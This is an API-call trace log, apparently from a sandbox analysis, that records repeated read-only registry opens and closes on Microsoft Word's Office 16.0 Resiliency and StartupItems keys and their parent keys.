[0087.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.477] RegCloseKey (hKey=0x530) returned 0x0
[0087.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.477] RegCloseKey (hKey=0x530) returned 0x0
[0087.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.477] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.478] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.478] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.478] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.478] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.478] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.478] RegCloseKey (hKey=0x530) returned 0x0
[0087.478] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.479] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.479] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.479] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.479] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.479] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.479] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.479] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.480] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.480] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.481] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.481] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.481] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.481] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.481] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x530) returned 0x0
[0087.481] RegCloseKey (hKey=0x530) returned 0x0
[0087.481] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x530) returned 0x0
[0087.482] RegCloseKey (hKey=0x530) returned 0x0
[0087.482] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c818 | out: phkResult=0x1c81c818*=0x530) returned 0x0
[0087.482] RegCloseKey (hKey=0x530) returned 0x0
[0087.482] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.482] RegCloseKey (hKey=0x530) returned 0x0
[0087.482] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.482] RegCloseKey (hKey=0x530) returned 0x0
[0087.482] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.482] RegCloseKey (hKey=0x530) returned 0x0
[0087.482] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.482] RegCloseKey (hKey=0x530) returned 0x0
[0087.482] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.483] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.483] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.484] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.484] RegCloseKey (hKey=0x530) returned 0x0
[0087.485] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.485] RegCloseKey (hKey=0x530) returned 0x0
[0087.485] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.485] RegCloseKey (hKey=0x530) returned 0x0
[0087.485] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.485] RegCloseKey (hKey=0x530) returned 0x0
[0087.485] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.485] RegCloseKey (hKey=0x530) returned 0x0
[0087.485] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.485] RegCloseKey (hKey=0x530) returned 0x0
[0087.485] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.485] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.486] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.486] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.486] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.486] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.486] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x530) returned 0x0
[0087.486] RegCloseKey (hKey=0x530) returned 0x0
[0087.486] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x530) returned 0x0
[0087.487] RegCloseKey (hKey=0x530) returned 0x0
[0087.487] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x530) returned 0x0
[0087.487] RegCloseKey (hKey=0x530) returned 0x0
[0087.487] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.487] RegCloseKey (hKey=0x530) returned 0x0
[0087.487] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.487] RegCloseKey (hKey=0x530) returned 0x0
[0087.487] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.487] RegCloseKey (hKey=0x530) returned 0x0
[0087.487] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.487] RegCloseKey (hKey=0x530) returned 0x0
[0087.487] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.488] RegCloseKey (hKey=0x530) returned 0x0
[0087.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.488] RegCloseKey (hKey=0x530) returned 0x0
[0087.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.488] RegCloseKey (hKey=0x530) returned 0x0
[0087.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.488] RegCloseKey (hKey=0x530) returned 0x0
[0087.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.488] RegCloseKey (hKey=0x530) returned 0x0
[0087.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.488] RegCloseKey (hKey=0x530) returned 0x0
[0087.488] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.489] RegCloseKey (hKey=0x530) returned 0x0
[0087.489] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.490] RegCloseKey (hKey=0x530) returned 0x0
[0087.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.490] RegCloseKey (hKey=0x530) returned 0x0
[0087.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.490] RegCloseKey (hKey=0x530) returned 0x0
[0087.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.490] RegCloseKey (hKey=0x530) returned 0x0
[0087.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.490] RegCloseKey (hKey=0x530) returned 0x0
[0087.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.490] RegCloseKey (hKey=0x530) returned 0x0
[0087.490] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ce08 | out: phkResult=0x1c81ce08*=0x530) returned 0x0
[0087.491] RegCloseKey (hKey=0x530) returned 0x0
[0087.492] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd28 | out: phkResult=0x1c81cd28*=0x530) returned 0x0
[0087.492] RegCloseKey (hKey=0x530) returned 0x0
[0087.492] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd48 | out: phkResult=0x1c81cd48*=0x530) returned 0x0
[0087.492] RegCloseKey (hKey=0x530) returned 0x0
[0087.492] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc38 | out: phkResult=0x1c81cc38*=0x530) returned 0x0
[0087.492] RegCloseKey (hKey=0x530) returned 0x0
[0087.492] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.492] RegCloseKey (hKey=0x530) returned 0x0
[0087.492] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cc58 | out: phkResult=0x1c81cc58*=0x530) returned 0x0
[0087.492] RegCloseKey (hKey=0x530) returned 0x0
[0087.492] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cd18 | out: phkResult=0x1c81cd18*=0x530) returned 0x0
[0087.492] RegCloseKey (hKey=0x530) returned 0x0
